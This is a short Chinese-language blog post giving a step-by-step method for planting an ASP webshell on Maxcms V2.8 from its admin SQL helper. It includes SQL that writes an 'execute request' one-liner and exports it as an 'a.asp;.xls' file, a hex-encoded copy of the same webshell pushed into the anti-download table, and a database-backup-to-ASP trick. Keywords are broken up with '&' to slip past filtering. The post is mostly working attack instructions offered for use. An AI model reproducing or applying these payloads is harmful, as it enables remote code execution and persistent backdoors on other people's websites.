由于本人網站所在服務器會過濾某些關鍵字，過濾成****，所以這里的某些字符我給替換一下，你們懂的！請去掉&就可以了。
程序版本為Maxcms V2.8，而網絡上有的獲取 shell 版本在2.5。2.5中大部分方法都已經不行。
后臺有個 SQL高級助手，于是立刻想到兩種思路。第一是通過Access導出a.asp;.Xls的方式。另一種是一句話直接寫入數據庫，將其備份為asp程序執行。
第一種方法比較好實現。如下語句就可以辦到。
create table a (a v&a&r&c&h&a&r(50))
insert into a (a) values ('<%e&x&e&cute request("value")%>')
select * into [a] in 'D:\web\a.asp;.xls' 'excel 4.0;' from a
獨自等待補充：
SELECT '<%e&x&e&cute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

其實使用這一句話就可以的，但是前提是表a是存在的，原作者的是可以成功的，這里只是多給一種方法。
第二種方式是采用將一句話寫入數據庫。備份出來，但由于數據庫中存在著防下載表。就算寫進了數據庫也不一定爆得出源碼，于是在SQL高級助手處使用如下語句。
update XXXX set notdown=0x3C2565786563757465287265717565737428226C222929253E
原理就不多說了。自己百度，這樣/inc/datas.asp就能爆出代碼。
通過后臺 → 模板 → 自定義標簽處往數據庫中寫入一句話，然后從后臺將數據庫備份成asp文件

關健詞：Maxcms